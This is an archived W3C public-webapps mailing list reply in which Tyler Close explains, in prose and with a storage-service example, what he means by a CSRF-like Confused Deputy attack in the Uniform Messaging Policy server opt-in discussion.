W3C home > Mailing lists > Public > public-webapps@w3.org > January to March 2010

Re: [UMP] Server opt-in

From: Tyler Close <tyler.close@gmail.com>
Date: Thu, 14 Jan 2010 16:33:44 -0800
Message-ID: <5691356f1001141633m575de8bfmec61127c40f065bb@mail.gmail.com>
To: Adam Barth <w3c@adambarth.com>
Cc: "Mark S. Miller" <erights@google.com>, public-webapps <public-webapps@w3.org>
On Thu, Jan 14, 2010 at 11:34 AM, Adam Barth <w3c@adambarth.com> wrote:
> On Thu, Jan 14, 2010 at 9:20 AM, Tyler Close <tyler.close@gmail.com> wrote:
>> The confidentiality of a resource can be compromised by a CSRF
>> vulnerability in a legitimate client.
>
> Can you define what you mean by CSRF?  I think we must have different
> ideas about what the term means because I don't understand that
> sentence.

I should have said CSRF-like, by which I mean a Confused Deputy
attack. I've been using the former term since some people find it
easier to understand.

For example, imagine a client using a third-party storage service. To
copy data from one file to another, they do a GET on one URL for the
source file, followed by a POST to another for the destination file.
If the storage service is an attacker, it could tell the client the
source file's URL is the URL for a resource the client can read, but
the storage server cannot. The confidentiality of this resource is
then compromised by a legitimate client that fell victim to a
CSRF-like attack.

--Tyler

-- 
"Waterken News: Capability security on the Web"
http://waterken.sourceforge.net/recent.html
Received on Friday, 15 January 2010 00:34:18 GMT

This archive was generated by hypermail 2.3.1 : Tuesday, 26 March 2013 18:49:36 GMT